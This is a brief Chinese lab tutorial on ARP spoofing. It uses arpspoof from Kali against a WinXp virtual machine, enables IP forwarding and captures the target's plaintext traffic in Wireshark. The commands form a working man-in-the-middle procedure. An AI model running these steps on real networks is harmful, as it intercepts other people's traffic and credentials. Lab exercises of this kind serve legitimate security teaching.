内容:
网络嗅探:Wireshark 监听网络流量,抓包。
ARP欺骗: ArpSpoof,实施ARP欺骗。
B对A实施ARP欺骗攻击,并获得A的明文信息。
工具:kali,WinXp,wireshark
1.打开WinXp虚拟机作为靶机,查看靶机ip
2.打开kali,输入【arpspoof -i eth0 -t 靶机的ip地址 靶机的网关地址】
如果出现这个提示,说明你的kali没有安装arpspoof,那么就要安装arpspoof。
下一步输入y,
然后输入【apt-get update】 更新系统,
然后输入【apt-get install dsniff】,【Y】继续执行
输入【arpspoof】查看已安装成功
接下来再输入【arpspoof -i eth0 -t 靶机的ip地址 靶机的网关地址】,开始攻击
"ctrl+z"停止攻击,
输入【echo 1 > /proc/sys/net/ipv4/ip_forward】进行ip转移
回到WinXp,打开浏览器,有网了
打开Wireshark,
搜索栏输入【ip.addr==靶机的ip地址】
再回到WinXp,随便搜索什么东西,wireshark可抓包到靶机的流量